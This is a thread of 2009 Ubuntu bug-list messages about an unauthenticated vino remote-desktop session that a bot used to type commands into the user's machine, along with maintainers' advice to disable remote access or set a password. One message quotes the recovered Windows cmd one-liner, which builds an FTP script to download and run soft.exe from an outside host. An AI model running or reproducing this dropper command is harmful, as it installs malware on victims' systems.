[Bug 383981] Re: severe remote vulnerability

2009-06-16 Thread Jonh Wendell
Disable remote access in System->Preferences->Remote Desktop. Only
enable it when someone is going to access your desktop.

Alternatively, set a password in that window.
Also, check "You must confirm each access to this machine" checkbox.

** Changed in: vino (Ubuntu)
   Status: New => Invalid

-- 
severe remote vulnerability
https://bugs.launchpad.net/bugs/383981
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.

-- 
ubuntu-bugs mailing list
ubuntu-bugs@lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs


[Bug 383981] Re: severe remote vulnerability

2009-06-16 Thread Jorge Urdaneta
question answered

** Changed in: vino (Ubuntu)
   Status: Incomplete => New

-- 
severe remote vulnerability
https://bugs.launchpad.net/bugs/383981
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.

-- 
ubuntu-bugs mailing list
ubuntu-bugs@lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs


[Bug 383981] Re: severe remote vulnerability

2009-06-16 Thread Jorge Urdaneta
I have recovered the commands received. Looks like a bot trying to make the PC 
download a virus and run it.
Two ubuntu boxes with vino enabled received the commands. I repeat: its like 
someone has remote control of the keyboard and type those commands asuming that 
it is a windows box.


%systemroot%\system32\cmd.exe
cmd /c echo open IP 21 >> ik &echo user dsluser telnet >> ik &echo binary >> ik 
&echo get soft.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &soft.exe 
&exit


%systemroot%\system32\cmd.exe
cmd /c echo open IP 21 >> ik &echo user dsluser telnet >> ik &echo binary >> ik 
&echo get soft.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &soft.exe 
&exit

-- 
severe remote vulnerability
https://bugs.launchpad.net/bugs/383981
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.

-- 
ubuntu-bugs mailing list
ubuntu-bugs@lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs


[Bug 383981] Re: severe remote vulnerability

2009-06-05 Thread Jorge Urdaneta
wherever my cursor where. It was like someone connected another keyboard
to the computer and began to type some commands trying to take control
of my computer asuming it is a windows box

-- 
severe remote vulnerability
https://bugs.launchpad.net/bugs/383981
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.

-- 
ubuntu-bugs mailing list
ubuntu-bugs@lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs


[Bug 383981] Re: severe remote vulnerability

2009-06-05 Thread Jamie Strandboge
** Changed in: vino (Ubuntu)
   Status: New => Incomplete

-- 
severe remote vulnerability
https://bugs.launchpad.net/bugs/383981
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.

-- 
ubuntu-bugs mailing list
ubuntu-bugs@lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs


[Bug 383981] Re: severe remote vulnerability

2009-06-05 Thread Thomas T
Where did you see those commands?

-- 
severe remote vulnerability
https://bugs.launchpad.net/bugs/383981
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.

-- 
ubuntu-bugs mailing list
ubuntu-bugs@lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs